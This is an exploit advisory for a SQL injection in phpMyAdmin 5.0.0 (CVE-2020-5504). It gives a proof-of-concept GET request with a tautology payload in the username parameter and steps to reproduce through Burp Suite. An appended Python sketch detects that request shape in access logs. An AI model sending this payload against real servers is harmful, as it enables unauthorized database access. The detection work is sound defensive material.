# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0
# Tested on: Windows
# CVE : CVE-2020-5504

Proof Of Concept

GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.

Steps to Reproduce

1. Log in to phpMyAdmin.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie.
3. Observe the result.
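
Detection sketch for the request shape shown in the proof of concept, added here as an example and not part of the original advisory or of phpMyAdmin: it scans web-server access log lines for server_privileges.php requests carrying validate_username and a username value that contains SQL metacharacters. The combined log format, the metacharacter heuristic and the function names are assumptions of this example, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Heuristic chosen for this example: quotes, backslash, semicolon and SQL
# comment markers are not expected in a MySQL account name being validated.
SUSPICIOUS_RE = re.compile(r"""['"\\;]|--|/\*|#""")

def suspicious_username(log_line):
    """Return the decoded username value if the line matches the PoC's request
    shape and the value carries SQL metacharacters, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.endswith("/server_privileges.php"):
        return None
    params = parse_qs(target.query, keep_blank_values=True)  # percent-decodes values
    if "validate_username" not in params:
        return None
    for value in params.get("username", []):
        if SUSPICIOUS_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_username(line)) is not None]

# Constructed sample log lines (addresses, timestamps and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Nov/2025:10:00:01 +0000] "GET /server_privileges.php?ajax_request=true&validate_username=set&username=reporting HTTP/1.1" 200 512',
    '192.0.2.44 - - [25/Nov/2025:10:00:07 +0000] "GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1" 200 498',
    '192.0.2.10 - - [25/Nov/2025:10:00:09 +0000] "GET /index.php?route=/ HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: suspicious username value {value!r}")
```

Access logs record only the query string, so the same parameters sent in a POST body would not be seen by this check; that case needs request-body logging or a WAF rule.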